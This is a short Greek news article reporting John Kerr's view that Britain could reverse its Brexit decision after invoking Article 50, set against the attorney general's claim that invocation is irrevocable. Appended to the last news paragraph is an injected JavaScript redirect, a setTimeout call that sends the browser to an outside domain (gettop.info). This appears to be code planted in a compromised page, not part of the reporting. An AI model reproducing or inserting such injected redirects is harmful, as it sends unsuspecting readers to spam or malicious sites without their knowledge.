«Το Λονδίνο μπορεί να αλλάξει γνώμη για το Brexit»

0
6

 

Αν και η Τερέζα Μέι δήλωσε πως η επίκληση του Άρθρου 50 θα γίνει μέχρι τέλος Μαρτίου, ο συντάκτης του συγκεκριμενου άρθρου της Συνθήκης της Λισσαβώνας, Τζον Κερ σημείωσε πως η Βρετανία μπορεί να αλλάξει γνώμη για το Brexit μετά το εναρκτήριο λάκτισμα των διαπραγματεύσεων για το διαζύγιό της με την Ευρωπαϊκή Ενωση.

«Μπορείτε να αλλάξετε γνώμη και όταν θα έχει αρχίσει η διαδικασία», δήλωσε ο Τζον Κερ, πρώην πρεσβευτής της Βρετανίας στην Ευρωπαϊκή Ενωση.

«Κατά τη διάρκεια της περιόδου αυτής, εάν μία χώρα αποφασίσει ότι τελικά δεν θέλουμε να αποχωρήσουμε, μπορεί όλοι να είναι πολύ θυμωμένοι που χάθηκε τόσος χρόνος. Μπορεί να προσπαθήσουν να αποσπάσουν κάποιο πολιτικό τίμημα, αλλά από νομικής απόψεως δεν μπορούν να επιμείνουν για να αποχωρήσουμε», είπε.

Ο γενικός εισαγγελέας Τζέρεμι Ράιτ δήλωσε στο Ανώτερο Δικαστήριο τον περασμένο μήνα ότι η επίκληση του Αρθρου 50, πιθανότατα μέσω μίας επιστολής της πρωθυπουργού Τερέζα Μέι είναι αμετάκλητη. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here